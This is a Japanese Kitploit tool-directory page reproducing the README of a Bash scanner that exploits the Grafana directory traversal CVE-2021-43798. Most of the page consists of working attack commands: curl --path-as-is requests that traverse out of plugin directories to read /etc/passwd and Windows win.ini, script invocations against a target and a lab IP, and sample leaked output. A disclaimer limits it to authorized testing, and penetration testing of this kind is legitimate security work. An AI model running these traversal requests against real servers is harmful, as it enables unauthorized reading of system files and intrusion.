Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Grafana-Plugin-Enumerator-CVE-2021-43798 — GrafanaのプラグインIDを列挙し、脆弱なインスタンス上で/etc/passwdやwin.iniの読み取りを試みることでCVE-2021-43798のディレクトリトラバーサルをテストするBashベースのスキャナーです。 | Kitploit
ツール/GitHubGitHub/squ1shification/grafana-plugin-enumerator-cve-2021-43798
脆弱性スキャナーウェブ脆弱性スキャナーエクスプロイトスクリプトと自動化ウェブアプリケーション悪用情報収集ペネトレーションテスト
GitHubsqu1shification/grafana-plugin-enumerator-cve-2021-43798

Grafana-Plugin-Enumerator-CVE-2021-43798

GrafanaのプラグインIDを列挙し、脆弱なインスタンス上で/etc/passwdやwin.iniの読み取りを試みることでCVE-2021-43798のディレクトリトラバーサルをテストするBashベースのスキャナーです。

リポジトリを見る
113時間27分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Grafana CVE-2021-43798 プラグイン列挙ツール

脆弱な Grafana バージョンに影響するディレクトリトラバーサル脆弱性 CVE-2021-43798 について Grafana インスタンスをテストするための、Bash ベースの小さなツールです。

このツールは Grafana のプラグイン ID を列挙し、curl --path-as-is を使用してディレクトリトラバーサルによって既知のファイルにアクセスできるかどうかをテストします。

認可されたセキュリティテストおよびラボ環境専用です。

ファイル

root@kitploit:~
.
├── grafana-windows.sh
├── grafana-linux.sh
├── plugins.txt
└── README.md
  • grafana-windows.sh: C:\Windows\win.ini へのアクセスをテストします
  • grafana-linux.sh: /etc/passwd へのアクセスをテストします
  • plugins.txt: 列挙時に使用される Grafana プラグイン ID を含むワードリストです。

要件

  • Bash
  • curl
  • Grafana のターゲット
  • ターゲットをテストするための許可

curl がインストールされていることを確認します:

root@kitploit:~
curl --version

スクリプトに実行権限を付与します:

root@kitploit:~
chmod +x grafana-windows.sh
chmod +x grafana-linux.sh

CVE-2021-43798 の概要

CVE-2021-43798 は Grafana におけるディレクトリトラバーサル脆弱性です。

脆弱なエンドポイントは以下を基盤としています: /public/plugins/<plugin-id>/

この脆弱性により、意図されたプラグインディレクトリの外側へトラバーサルできる可能性があります。

curl でテストする際に重要な部分は以下です: --path-as-is

このオプションがない場合、クライアントはサーバーへ送信する前にパスを正規化する可能性があります。

Windows スキャナー

Windows スキャナーは以下を取得しようと試みます: C:\Windows\win.ini

このパスは HTTP リクエスト内で以下のように表現されます: Windows/win.ini

基本的な使用方法

root@kitploit:~
./grafana-windows.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

例:

root@kitploit:~
./grafana-windows.sh -u http://TARGET:3000 -w plugins.txt

Windows 手動テスト

以下のようにしてプラグインを手動でテストできます:

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

ラボターゲットの場合:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../Windows/win.ini"

成功したレスポンスには Windows INI ファイルの内容が含まれているはずです。

Linux スキャナー

Linux スキャナーは以下を取得しようと試みます: /etc/passwd

基本的な使用方法

root@kitploit:~
./grafana-linux.sh \
    -u http://192.168.68.193:3000 \
    -w plugins.txt

一般的な例:

root@kitploit:~
./grafana-linux.sh -u http://TARGET:3000 -w plugins.txt

Linux 手動テスト

root@kitploit:~
curl --path-as-is \
"http://TARGET:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

ラボターゲットの場合:

root@kitploit:~
curl --path-as-is \
"http://192.168.68.193:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"

Linux での成功したレスポンスには、以下に類似したエントリが含まれているはずです:

root@kitploit:~
root:x:0:0:root:/root:/bin/bash

コマンドラインオプション

両方のスキャナーは同じ基本引数を使用します:

  • u, --url : Grafana のベース URL
  • w, --wordlist : プラグインワードリスト
  • f, --file : テストするファイル
  • h, --help : ヘルプを表示
ツールをダウンロード